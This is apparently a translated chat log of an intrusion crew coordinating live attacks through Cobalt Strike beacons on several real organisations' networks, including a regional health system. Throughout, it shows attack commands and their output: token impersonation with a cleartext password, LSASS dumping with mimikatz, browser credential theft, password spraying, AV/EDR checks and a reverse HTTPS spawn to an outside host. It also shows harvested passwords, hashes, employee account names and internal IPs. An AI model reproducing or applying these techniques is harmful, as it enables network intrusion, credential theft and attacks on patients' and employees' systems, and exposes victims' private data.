There is a system by my saved messages from ms outlook abhinav.bhaskar chandan koushik.s mohit.goel nitin.choudhary pritam sudhir varun vivek.kumar The command completed successfully. ``Be looking furtherxxm, it's unlikely you'll be able to brute force====== CredEnum ====== what's the group? From seabelt what's the hash? Target : LenovoSsoSdkDidToken UserName : LenovoSsoSdk Password : b9352d67360260a670e5fcea3efebe7faae0b5baabb1339247f07fa2e6b5d0270 CredentialType : Generic PersistenceType : LocalComputer LastWriteTime : 13-07-2020 13:59:07 Target : DeviceMetrics UserName : DeviceMetricsUserName Password : 0023b668-0ad7-4e6e-aefe-8822e1471728,00002d6ae2381ed4ebd88db03cdc8b991d025b7db8a551556d269716eb1e3352616ea972f08db23cf983371a2ed7fc6c6a2ea7c687a290111e51545c94c5873a CredentialType : Generic PersistenceType : LocalComputer LastWriteTime : 11-12-2019 15:03:33 ``` Can you unload it? You're better off) No trusts, can you continue to work in the vault? beacon> run rundll32 c:\Users\abinash.pattnayak\AppData\Local\Microsoft\XboxLive\AuthStateCache.dll entryPoint [*] Tasked beacon to run: rundll32 c:\Users\abinash.pattnayak\AppData\Local\Microsoft\XboxLive\AuthStateCache.dll entryPoint [+] host called home, sent: 116 bytes I'll give you the dll))) Especially the Indians) It's worth it for me))) happay.in+I'm waiting for you to decide on the "validity" and I'll send you the dll okSnap through the verification view not taken off? macafee by the way not really biting AB ====== AntiVirus ====== Engine : Windows Defender ProductEXE : windowsdefender:// ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe Engine : McAfee VirusScan ProductEXE : C:\Program Files\McAfee.com\Agent\mcupdate.exe ReportingEXE : C:\Program Files\Common Files\mcafee\mmsshost\MMSSHOST.exe [*] Completed collection in 0.06 seconds ``okjg look av``. beacon> make_token JDOSSN\nddevbernst Tractor20! 
```
[*] Tasked beacon to create a token for JDOSSN\nddevbernst
[+] host called home, sent: 47 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
beacon> shell dir \\10.28.92.108$
[*] Tasked beacon to run: dir \\10.28.92.108$
[+] host called home, sent: 52 bytes
[+] received output:
We can't sign you in with this credential because your domain isn't available. Make sure your device is connected to your organization's network and try again. If you previously signed in on this device with another credential, you can sign in with that credential.
```

There is a session in the cob. From the entry PC you can see 15 machines (42 in total); the network has only servers (2008-2019). The 445, SQL, FTP and web ports are closed.
The user apparently hasn't used the account for a long time, or only uses the Citrix web interface, since his files are completely absent.
There is only one DA on the network, and his Kerberos ticket is there.
Searching for files, shares, etc. gave nothing (the browser is not used, and neither is a password manager).
GPP, Zerologon: bypassed.
A mass scan of what sits next to the network, by mask, gave nothing except the ones that were already lit up before.
No way to get in; tried all the LPE exploits from msf.
Tell me in one last message what has been done so far.
It's the same. None of the exploits worked. Give me a new one)
And then give me a new one.
Even 15 minutes for the checkpoint: with the LPE exploits in msf nothing works; a lot of the LPEs failed because it is Windows Server and not 10, and so on.
So what do we have here?
Then think about it, and if you miss, give a replacement LPE.
Windows: found nothing on port 445. The plan is to continue with LPE; chisel will come soon, as usual waiting for an hour.
But for the future we need to look for where the admin is; so far that's it)
And do you already have something to go on?)
Some serious AV here, carefully.
Oooh, what AV?
Is it like that?
And you found it, yes?

But that's tomorrow, or through VM startup.
I suggest making a share and throwing the dll there.
Decided to make a mold of the system and deploy it locally?))
What do you have there at all, for 4 GB?
Then write to the address) 104....140 yours?
200 MB*, and moreover files over 200 GB in compressed form are not downloaded through the cob; files over 50 MB are archived. What are you downloading there in general?
user2-2
```
beacon> download C:\ProgramData\trustdmp_17.txt
[*] Tasked beacon to download C:\ProgramData\trustdmp_17.txt
[+] host called home, sent: 70 bytes
[-] File 'C:\ProgramData\trustdmp_17.txt' is either too large (>4GB) or size check failed
```
And did they take the subnets away?
@tl1 call the department please, otherwise he won't answer again.
A couple of shellcodes were sent to him to bypass Symantec.
Release: give me a sign of life, so that I'm not writing to myself.
Need to urgently make #1-done-rtpcompany-com the priority now.
104.....69 cob, there are still live ones there.
```
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
rtpco.local
```
But it's old; you need to update all the access info in the conf.
+user? and so?
I don't see any new sessions in it, I don't see your cob.
uternicus.com 74.118.138.118 domain cob
Doesn't fly, lel. Either give me a psh stager and I'll throw it into my cob, or I want the dll.
@user3 load, go) thank you
`waterway.com` do the conf please
`z3 will be on #wilsonart-com now. I'll prepare the second grid for work; who will take over?
Yes, you can of course still look for a cna as an option)
Can a symbol be assigned in the note of each color? :zany_face:
As far as I know, you can't)
To be beautiful? =)))))
I think not.
@tl1 @tl2 in the cob, can you implement sorting sessions by color?
The network seems to be small; accesses and work: DA right at the entry point.
One network so far. Put the links in the conf, screenshots.
Didn't throw it; the sessions didn't fall off?
Ok, and what about yesterday's session?
It hasn't really scrambled anything yet; work on wilsonart later, or give the dll?
@tl1 where to yank those 2 sessions with DA?
hello
greetings :space_invader:
see you tomorrow)
goodnight)
eh
Goodnight
night night night
Tomorrow, that is today. All goodnight; don't forget that tomorrow at 5 there will probably be a crossover with quarantine)
Look at the DNS / WSUS / SCCM servers in all trusts; got through everything except quarantine.
I don't understand, did we burn that, or something?
```
beacon> shell ping LRH-NESSUS01.lrhc.local
[*] Tasked beacon to run: ping LRH-NESSUS01.lrhc.local
[+] host called home, sent: 59 bytes
[+] received output:
Ping request could not find host LRH-NESSUS01.lrhc.local. Please check the name and try again.
```
```
dn:CN=LRH-NESSUS01,OU=LRHC Servers,DC=lrhc,DC=local
```
```
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpWeb.exe all
[*] Tasked beacon to run .NET program: SharpWeb.exe all
[+] host called home, sent: 705073 bytes
[+] received output:
=== Chrome (All Users) ===
[X] Exception: Could not find a part of the path 'C:\Users\cmelliott\AppData\Local\Google\Chrome\User Data\Default\Login Data'.
=== Checking for Firefox (All Users) ===
=== Checking Windows Vaults ===
[-] Invoke_3 on EntryPoint failed.
```
He got it from SharpChrome, and what's that?
```
C:\Users\cmelliott\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://support.lrhc.org/,https://support.lrhc.org/,9/7/2017 12:27:56 PM,13149278876245510,,MasterKey needed - {12d56280-2898-47c4-ba2c-aaf64ced6463}
C:\Users\cmelliott\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://lansweeper.lrhc.local/,http://lansweeper.lrhc.local/,9/7/2017 2:11:31 PM,13149285091430011,,MasterKey needed - {12d56280-2898-47c4-ba2c-aaf64ced6463}
```
?
Mail accesses: nothing interesting there.
There can be accesses from the accounts dump; the browser, then from winlogon.
Exactly the same as in winlogon?
```
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 296058 bytes
[+] received output:
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SafetyKatz.exe
[*] Tasked beacon to run .NET program: SafetyKatz.exe
[+] host called home, sent: 836651 bytes
[+] received output:
[*] Dumping lsass (572) to C:\WINDOWS\Temp\debug.bin
[X] Dump failed: False
[+] received output:
[*] Executing loaded Mimikatz PE

  .#####.   mimikatz 2.1.1 (x64) built on Jul 7 2018 03:36:26 - lil!
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi' ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # Opening : 'C:\Windows\Temp\debug.bin' file for minidump...
```
```
ERROR kuhl_m_sekurlsa_acquireLSA ; Memory opening
```
cmelliott: this one didn't get dumped; this one is not on site.
Yes, and I'm dumping logonpasswords anyway; if they are on site, then look for their PCs.
The two remaining hashes haven't gone through cmd5; only with the IT label is there a cleartext, only from gsnelson.
The result is kind of clear. Tasks:
```
10.5.50.228:445 (platform: 500 version: 5.1 name: IT03 domain: LRHC)
```
```
>sAMAccountName: cmelliott
>description: IT
>sAMAccountName: ljcurrie
>description: Clinical System Analyst II
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
```
+ go into the trusts, comb through their PCs and check the mail from the list above; take the guys with an IT description.
Well, this I know) In any case you have a hooked socket; because of your actions all the re-opened messages (the "unread" label was reset) went back, so do not delete anything, do not write, do not call, do not forward)
```
>memberOf: CN=PRH CPSI Admins,OU=PRH Distribution Groups,OU=PRH Groups,OU=Prairie Ridge,DC=lrhc,DC=local
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
```
```
>memberOf: CN=PRH CIS - RW,OU=PRH Security Groups,OU=PRH Groups,OU=Prairie Ridge,DC=lrhc,DC=local
>sAMAccountName: slarsen
>description: Listed as Shawn Larsen account shawn
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
>sAMAccountName: PRHADMIN
>description: MEI's and Grant's Admin account for lrhc
```
```
>memberOf: CN=PRH_support,OU=Groups,DC=lrhc,DC=local
>sAMAccountName: ldkugler
>description: CIS
>sAMAccountName: smhanson
>description: CIS
>sAMAccountName: mdflugstad
>description: CIS
>sAMAccountName: trthormodson
>description: CIS
>sAMAccountName: mjkvern
>description: CIS
>sAMAccountName: shanson
>description: CIS
>sAMAccountName: jdpettigrew
>description: CIS
>sAMAccountName: cmelliott
>description: IT
>sAMAccountName: sbgravning
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
```
```
>memberOf: CN=G_CISTechs,OU=CIS,OU=Departments,DC=lrhc,DC=local
>sAMAccountName: mjblank
>description: Systems Analyst
>sAMAccountName: jyrkwa
>description: CIO
>sAMAccountName: smhanson
>description: CIS
>sAMAccountName: mdflugstad
>description: CIS
>sAMAccountName: trthormodson
>description: CIS
>sAMAccountName: mjkvern
>description: CIS
>sAMAccountName: shanson
>description: CIS
>sAMAccountName: cmelliott
>description: IT
>sAMAccountName: sbgravning
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
```
```
>memberOf: CN=CIS_VNC,OU=CIS,OU=Departments,DC=lrhc,DC=local
>sAMAccountName: ldkugler
>description: CIS
>sAMAccountName: mjblank
>description: Systems Analyst
>sAMAccountName: jyrkwa
>description: CIO
>sAMAccountName: smhanson
>description: CIS
>sAMAccountName: llpearso
>description: CIS
>sAMAccountName: mdflugstad
>description: CIS
>sAMAccountName: trthormodson
>description: CIS
>sAMAccountName: cbstigen
>sAMAccountName: mjkvern
>description: CIS
>sAMAccountName: shanson
>description: CIS
>sAMAccountName: jdpettigrew
>description: CIS
>sAMAccountName: ljcurrie
>description: Clinical System Analyst II
>sAMAccountName: cmelliott
>description: IT
>sAMAccountName: sbgravning
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
```
```
>memberOf: CN=CIS.Techs,OU=CIS,OU=Departments,DC=lrhc,DC=local
>sAMAccountName: smhanson
>description: CIS
>sAMAccountName: mdflugstad
>description: CIS
>sAMAccountName: mjkvern
>description: CIS
>sAMAccountName: shanson
>description: CIS
>sAMAccountName: cmelliott
>description: IT
>sAMAccountName: sbgravning
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
```
```
>memberOf: CN=IT,OU=CIS,OU=Departments,DC=lrhc,DC=local
>sAMAccountName: mtsuser
>description: Pargon Admin
>sAMAccountName: Administrator
>description: Built-in account for administering the computer/domain
>sAMAccountName: mjblank
>description: Systems Analyst
>sAMAccountName: jyrkwa
>description: CIO
>sAMAccountName: smhanson
>description: CIS
>sAMAccountName: mdflugstad
>description: CIS
>sAMAccountName: magrel
>sAMAccountName: mjkvern
>description: CIS
>sAMAccountName: shanson
>description: CIS
>sAMAccountName: frsecure
>description: FRSECURE account for network test
>sAMAccountName: cmelliott
>description: IT
>sAMAccountName: parafhir
>description: FHIR user
>sAMAccountName: sbgravning
>sAMAccountName: tableauadmin
>sAMAccountName: ocmagrel
>sAMAccountName: ocansi
>sAMAccountName: ocbdi
>sAMAccountName: occoldagt
>sAMAccountName: ocsign
>sAMAccountName: ocbatchcmp
>sAMAccountName: ocile
>sAMAccountName: ocindexagt
>sAMAccountName: ocpurge
>sAMAccountName: octransagt
>sAMAccountName: ocweb
>sAMAccountName: ocfaxin
>sAMAccountName: ocadmin
>sAMAccountName: OCARCREL
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
```
```
>memberOf: CN=Computer Information Systems,OU=CIS,OU=Departments,DC=lrhc,DC=local
>sAMAccountName: djkrog
>description: CIS
>sAMAccountName: ldkugler
>description: CIS
>sAMAccountName: mjblank
>description: Systems Analyst
>sAMAccountName: jyrkwa
>description: CIO
>sAMAccountName: smhanson
>description: CIS
>sAMAccountName: llpearso
>description: CIS
>sAMAccountName: mdflugstad
>description: CIS
>sAMAccountName: taaxness
>description: Clinical Systems Analyst II
>sAMAccountName: trthormodson
>description: CIS
>sAMAccountName: cbstigen
>sAMAccountName: mjkvern
>description: CIS
>sAMAccountName: shanson
>description: CIS
>sAMAccountName: jdpettigrew
>description: CIS
>sAMAccountName: ljcurrie
>description: Clinical System Analyst II
>sAMAccountName: cmelliott
>description: IT
>sAMAccountName: sbgravning
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
```
```
>memberOf: CN=CIS Support,OU=CIS,OU=Departments,DC=lrhc,DC=local
>sAMAccountName: djkrog
>description: CIS
>sAMAccountName: ldkugler
>description: CIS
>sAMAccountName: mjblank
>description: Systems Analyst
>sAMAccountName: jyrkwa
>description: CIO
>sAMAccountName: smhanson
>description: CIS
>sAMAccountName: mdflugstad
>description: CIS
>sAMAccountName: intranet
>description: LRHC's Intranet Access
>sAMAccountName: taaxness
>description: Clinical Systems Analyst II
>sAMAccountName: trthormodson
>description: CIS
>sAMAccountName: cbstigen
>sAMAccountName: mjkvern
>description: CIS
>sAMAccountName: shanson
>description: CIS
>sAMAccountName: jdpettigrew
>description: CIS
>sAMAccountName: ljcurrie
>description: Clinical System Analyst II
>sAMAccountName: cmelliott
>description: IT
>sAMAccountName: sbgravning
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
```
Apart from not taking anything there, can you tell me if there is something we don't know? Do I need to spell out the rules, or is it that obvious?
Search for his username, hostname, etc. through the local Exchange.
Check his email in Chrome: no credentials saved, only visible in the login; when authorization was asked, what was shown?
So the client ran?
Chrome history showed that he logged in to vSphere + he had a client installed.
And you said he was gone for a few days. You said you found where he had the client installed.
I don't understand something) Only found that he went to vSphere, nothing else.
So what did you find?
3) we went through RDP; he was gone for several days.
So here's the plan:
1) now look at more "interesting" people from the groups above and, the classic way, look at their PCs
2) go to their mail server under the credentials of your internal DA and other IT staff and look through their correspondence for access to vSphere
3) wait for `gsnelson` to get off the machine, go in via RDP and try to get in
4) get into the trust; it looks like there's an admin one {\\10.91.19.35\volume_1})
go to another trust
You rascal, and didn't say)))
I took the quarantine through another domain; how did you take it off?)
I did)
@user7 you took the quarantine from there
Is there a hell of a lot of information about us?
Shared resources at 10.91.19.35 (DNS-323):
```
Share name  Type   Used as  Comment
lp          Print           USB Printer
Volume_1    Disk
web_page    Disk            Enter Our Web Page Setting
The command completed successfully.
```
```
Shares for 10.91.19.35:
[--- Unreadable Shares ---]
lp
IPC$
[--- Listable Shares ---]
Volume_1
web_page
```
Give it net view
nas in quarantine... hmmm, in quarantine is there such a thing, are we interested?
```
10.91.19.35:445 (platform: 500 version: 4.9 name: IT-DLINK-NAS domain: ELEAH)
[--- Listable Shares ---]
Volume_1
web_page
```
Win authorization didn't go through either, didn't get the root pass? Did you try it? Win 10? Was it in the processes on the computer? Do you have his clipass in his processes? Was there a websphere client in his processes, but the gootlogin dude gsnelson has access? where the websphere client was. 1) do we have access to the rdp there? 2) what is his username?
Yes, I'm collecting a list so is anyone here?
`memberOf: CN=CIS_VNC,OU=CIS,OU=Departments,DC=lrhc,DC=local` this one is not needed
1) do we have access to rdp there? 2) his login what? where was the websfer client all others here list login name + its title, description.
who?
found one where you went to the sphere, no credentials saved give me a list and I'll try to look outside the domain they don't have a normal admin computer labeled i went to the OU where they should have admin PCs - i told you gsnelson but there are iis and printers everywhere from Administrator on one machine was a link to veeam.com without any creds process YES will be decent on a large number of servers how many got around did not count i go where there are processes on rdp session or hanging process yes gsnelson has a sphere client on his truck, i try to find out how many admins and it specialists / how many have bypassed it? total send the unnecessary to the slip, out uncontrollable, we almost all sit in the same cob) what is the noise, and i? about so many sessions what? @user4 what did i ever say about sessions?
192.168.0.247 192.168.0.253
they have rdp access to these machines can't session gopher? They don't have SSH
CPNBACKUP.lrhc.local
if only the keylogger catches them there's nothing They don't save passwords. + kind of go to the sphere through the client, not through the web then shoot without a session there sits YES, open chrome - 10.91.18.119 sessions do not fly there is a list of software on the machines `{lrhprofiles\admins\pcsysteminfo` here are files on all computers, in them is specified who is LA on what machine
```
UseWUServer      : True
Server           : http://prh-print01:8530
AlternateServer  :
StatisticsServer : http://prh-print01:8530
```
`CN=OCMAGREL,OU=Service Admins` `ocmagrel` this username is found everywhere
Good night, good night, good night... 3 a.m. we'll close by tonight and you'll have 7 hours to get ready... that's it 8 a.m. let's sleep it off, just tell me what time to be there? if you have any suggestions ready to listen so what? enough time? 7-8 p.m. Evening in any case, it should be done during their working hours when the admins will be in the network
calculate that you need to find access to the sphere after 3 a.m. So either end before 5 at local time for sure will not run a day later
What time are we going to? i.e. for today i can't on sunday so why don't we reschedule for tomorrow?) and we won't scan the whole range. they just scanned without specifying ports
everything was strange sphere, no web interface, no ccsh... they may have changed the ports - let's check it out
They have a lot of places + they may go to the lin through it
Why are you looking for vnc? service RealVNC.SYSTEM.vncserver.vncagent.978162299 -_hash 6023144d82c1866db090b27f884c921c310b505ca9dd0f5be587de06362dc59b and ea-check the accesses themselves dare guys found, but they say there are still empty cars admins? well then while we chisel the current should be finished but from Mon there will be other work da (and tomorrow is Saturday (well, in general the line is one and in one domain leave for tomorrow? but I have not yet checked it) well if trusts are remote from each other I think we need to be in all 3? so we will not close it today) There are 3 trusts. and in none of them yet found a sphere
user9 it is Access is denied.
rash that with the system, that with the token. To remove something need to be in the process user? these? (Not one computer out of the 45 with adm in the name pings?
Rumor has it, I'll try it through tulkit, it seems to work better with sniper. [-] Invoke_3 on EntryPoint failed. Have you tried the sharpshooter case?
```
>sAMAccountName: baleitch
>memberOf: CN=G VNC_User
```
```
>sAMAccountName: gdhoff
>memberOf: CN=G VNC_User
```
```
beacon> shell ping Scott.lrhc.local
[*] Tasked beacon to run: ping Scott.lrhc.local
[+] host called home, sent: 176 bytes
[+] received output:
Ping request could not find host Scott.lrhc.local. Please check the name and try again.
```
```
>dNSHostName: Scott.lrhc.local
>memberOf: CN=Administrators
```
```
dn:CN=Hanson\, Scott
>sAMAccountName: smhanson
>memberOf: CN=CIS_VNC
>memberOf: CN=Backup Notification
```
```
192.168.254.36:445 (platform: 500 version: 5.1 name: EMEDWRKSTN domain: WORKGROUP)
```
```
LRH-RDP01.lrhc.local
```
is written in web) you can use a tor browser to check if this kind of thing
```
OfficeMate®, the most widely used server-based practice management solution in the optical industry, offers a secure experience with extensive tools to manage billing, appointment scheduling and inventory
```
written into sql.
honestly sort the fuck out in smtp? apparently this fuckin' thing is prefixed by `LRHR`
SMTP: SAGESRVR.lrhc.local LRHRECRUIT.lrhc.local
lazagne seems to be pulling everything
@tl1 Tell me if there is something for coba to pull the vnc-creds from, as it seems to me `vncserver.exe vmtoolsd.exe`
It looks like a separate category judging by its name, not sql at all
then why not a terminal server? SAGESRVR.lrhc.local
I'm busy) svot and fine) oy just about me) strong, nimble, brave and skillful and no one told me that you're short of people
user9 needs one volunteer for another mission
`CITYISLANDSVR` also only sofos + on dk? sitbelt also can't detect no red at least on these `bally44hodc1 bgukhoveeam` if there's really only sofos there, then octam red check on google psedr_query you can't determine everything once again
```
[+] Determining what EDR products are installed on BGAZRDC01...
[+] host called home, sent: 358 bytes
[+] No EDR products found! Operate at your own risk!
[+] Determining what EDR products are installed on BALLY44HODC1...
[+] host called home, sent: 60 bytes
[+] No EDR products found! Operate at your own risk!
```
and no EDR products are found on DK.
```
Determining what EDR products are installed on WEBMARSHAL...
[+] host called home, sent: 359 bytes
[+] savonaccess.sys Found
[+] 1 EDR Products Found!
======================
| Vendor Information |
----------------------
[+] Sophos Found!
```
Tell me right away what AV is on the servers.
sat sat sat in chat help @user4 went to off docked putlibslimeyvpn knocked out sit the fuck down to look for cars without sofos atam better yet work through it look for vpn
```
====== AntiVirus ======
Engine       : Sophos Anti-Virus
ProductEXE   : C:\Program Files (x86)\Sophos\Sophos Anti-Virus\WSCClient.exe
ReportingEXE : C:\Program Files (x86)\Sophos\Sophos Anti-Virus\WSCClient.exe
Engine       : Windows Defender
ProductEXE   : windowsdefender://
ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe
```
```
[+] Determining what EDR products are installed on localhost...
[+] host called home, sent: 58 bytes
[-] could not open \\localhost\C$\windows\sysnative\drivers\*: 3
[+] No EDR products found! Operate at your own risk!
```
Tell me what's changed first. The passwords have been changed. mimic has been disabled in some places and it works and crashes the session where it has not been disabled sessions die from almost everything (request dir remote/start the case) like russian roulette in essence us which is 192.0.2.3 was either knocked out or moved to another address
@user7 nice add.com quite enough to stay yourself from 5 to 10 if you have active sessions of 10 + there slip for 10 minutes not to spam Leave not many sessions good night do not forget to clean the files sleepy night 150 slip happy sessions in slip to monday cheers well done everyone thank you +))) tell more @user3 not to be late Mon by 10 am start closing da, lets do so by 10 am probably they will have an hour at night. do you want it by 10 or on the morning of pnc 4-5 at night on pnc? tomorrow by 6 there is no point in going on a working day in general such things on desktop more shortcut link to disks how to find it? where? on the desktop? chanson mdb had a database where did you find it? yes, if you found access to the center by what time?
well, then me and @user8 no sessions(
```
>lastLogon: 132304000305532732
```
Look up when did he even log in. maybe a long time ago is unlikely) mb he had a lockout on 1 try? well, if you do not lock it specifically, it is unlikely you have locked it)) do not worry) 0 in ad info can look at the user there is a question of how much badpasswordcount, or in ad info have not looked at the users can look in ad it? it means that he is locked before, locked just now or at another attempt to be locked
```
Account lockout detected
```
I don't understand that conclusion. It's probably not locked but "was" locked.
```
[-] 10.100.1.101:445 - 10.100.1.101:445 - Could not connect
```
2 mina lol, session broke down this one broke down all fails with this password let everyone in yes just if you didn't exactly brute force this user or something like that you had nothing to do with it, kznm
```
[-] 10.100.1.101:445 - Account lockout detected on 'jonb', skipping this user.
```
kerb is not brutalized yet kerb is probably not going to hit anything if it doesn't work for yes or other service you can try but in general you're right and it's more serviceable can SharpSpray run with this password?)) nsupport ;)) alas(
```
[-] 10.100.1.101:445 - 10.100.1.101:445 - Failed: 'orange_fact\Svc_ADSync:Sync!T4u',
```
Try that one too Svc_ADSync might work because it's a service account see if there are other users in the domain with the Svc_ prefix. because the name of the account ends with the phrase from the password
In fact, you can just do smb_login to check if someone from the domain admins has such a password. what is the profit of autobruting here?
```
[-] 10.113.1.126:445 - 10.113.1.126:445 - Failed: 'orange_fact\Svc_CRMailSync:Sync!T4u',
```
Try smb_autobrute on this pass, it turns out it has no LA rights anywhere, right? I guess this Svc_CRMMailSync doesn't have a wheelbarrow.
```
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 231 bytes
[+] received output:
vpinc.net
beacon> shell whoami
[*] Tasked beacon to run: whoami
[+] host called home, sent: 37 bytes
[+] received output:
orange_fact\color764
```
aahhhh, that's what I told him without the domain.) it's just that their domain is vpinc.net and whoami shows the other one, what did you check it with by the way?
why would he have the correct username/password? You'll still get it checked at LA with domain? orange_fact\Svc_CRMailSync:Sync!T4u How do you run it? Almost all the hosts have been through, but none with "admin" tagged on them. Any success?
Global Group memberships *Domain Users
Let's see what groups he's in, `net user Svc_CRMailSync /dom` oo great.
```
[+] 10.100.1.63:445 - 10.100.1.63:445 - Success: 'orange_fact\Svc_CRMMailSync:Sync!T4u'
```
Are there any kerbs from here? Check to see if the pass is valid?
```
dn:CN=Svc_CRMMailSync,OU=Orange City,OU=Service Accounts,DC=vpinc,DC=net
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>cn: Svc_CRMailSync
>description: Service Account for CRM Mail Sync in O365
>givenName: Svc_CRMMailSync
```
:thumbsup: from what - it's not clear hashes are there. `\\10.100.1.89\ldlogon\LDHashDir`
Then go through the ones that are available - crawl with your hands, look for pvsh bat scripts of all kinds
vot full in the past highlighted interesting and already scanned everything? so few cars? as well as c$ admin$ there is nowhere except his output yes?
`shell SharpShares.exe shares > shares.txt`
Works, check in lab, i didn't check, and through shell windows won't open any? and stop if dropped? i think not (but through `>>` won't work? alas no SharpShares output to a file?
```
beacon> shell net accounts /dom
[*] Tasked beacon to run: net accounts /dom
[+] host called home, sent: 48 bytes
[+] received output:
The request will be processed at a domain controller for domain MandKLaw.com.
System error 5 has occurred.
Access is denied.
```
We must have blocked it...
```
beacon> shell net user panderson /dom
[*] Tasked beacon to run: net user panderson /dom
[+] host called home, sent: 54 bytes
[+] received output:
The request will be processed at a domain controller for domain MandKLaw.com.
System error 5 has occurred.
Access is denied.
```
I'll start it. And SharpShares? on a working session just killed it just did not work - hangs with what error? crashes process did you run it online? + cleartext creds no under skul and 17-010 yesterday tried that's it, it's gone.
farm is still off?
```
[*] tasked beacon to spawn (x86) windows/foreign/reverse_https (slypad.com:443:443)
```
passnulnet, 15 hours ftp exploits here is not the best solution and hardly a working session? found ldap and pointed it in the batken how to do?) me in the chat there is not a nickname) (@user9 here in bellymore who will stay here? there's one left for work, i'm still digging around at least have you cleaned the bash behind you? there's one lin with ssh access, but nothing good to come out of there either, no way to move forward so far, no way to do anything here?
private part of the nixam 600+ ips was scanned already understood the old session is out kst if you do not know, logging in under the account of two at the same time can not go there I did not go, I can not tell you and most likely logging in under vpn I even hz where you login) ie here ok? I have doubts) and what's the difference they just have some function apparently a it staff kirase 3-4 saw here should be ZEWS there more was met already) are used by some software that works as AD factories)))) there are names servookvig saw more tanos in what the scanner, loki
Why all of a sudden? @tl2 isn't it a juice or testlab?
so you can import it yourself and I'll send you more info from AIS so you can work with it by hand but there's no tpsh) yeah I didn't go there conmille the same thing but you can check other versions yourself there 2003 x2 I poked there with standard msf ms17 and python from git, both bypassed
19h 52m 3s) (guid:{5d2ad53d-09fe-4fb8-8e9b-48dc8396f1c1}) (authentication domain:AD) [+] 172.16.200.140:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EL-DROA-APP) (authentication domain:AD) [*] 172.16.200.147:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:25w 5d 0h 54m 31s) (guid:{cee00f93-7579-40f0-8a43-677a91c17e71}) (authentication domain:AD) [+] 172.16.200.147:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EL-UI-TEST) (domain:AD) [*] 172.16.200.149:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:1w 5d 6h 16m 48s) (guid:{c46e64fa-d123-4ff9-8fe6-217855cd2163}) (authentication domain:AD) [+] 172.16.200.149:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EL-WEBAD-TEST) (domain:AD) [*] 172.16.200.157:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:1w 5d 5h 48m 20s) (guid:{512a6ea3-c927-4cf7-8fe3-947edc01fbb8}) (authentication domain:AD) [+] 172.16.200.157:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EZPAY) (authentication domain:AD) [*] 172.16.200.162:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:4d 16h 36m 17s) (guid:{a0c16382-7c20-4c2a-aaf9-722c0a9aac21}) (authentication domain:AD) [+] 172.16.200.162:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:EL-SS-TEST) (authentication domain:AD) [*] 172.16.200.164:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:5d 19h 36m 28s) (guid:{b069c426-2917-46b2-9848-17f5b4f2ae3f) (authentication domain:AD) [+] 172.16.200.164:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:IN-LF-1) (authentication domain:AD) [*] 172.16.200.165:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:12w 6d 21h 11m 55s) 
(guid:{8b51e9d5-c4f3-468d-9016-ac868929551c}) (authentication domain:AD) [+] 172.16.200.165:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:IN-LF-2) (authentication domain:AD) [*] 172.16.200.166:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:5w 3d 0h 11m 21s) (guid:{8d1b2b4e-fa50-48c5-bebd-612a00c9ca68}) (authentication domain:AD) [+] 172.16.200.166:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:IN-LF-3) (authentication domain:AD) [*] 172.16.200.167:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:4d 5h 56m 21s) (guid:{496b0655-8b75-408e-9fd8-ab6fae7860f6}) (authentication domain:AD) [+] 172.16.200.167:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:IN-LF-DB) (authentication domain:AD) [*] 172.16.200.170:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:4d 4h 3m 42s) (guid:{db30dc9d-d540-40d1-8d69-8097486d7b52}) (authentication domain:AD) [+] 172.16.200.170:445 - Host is running Windows 2016 Datacenter (build:14393) (name:LF-FORMS) (domain:AD) [*] 172.16.200.172:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 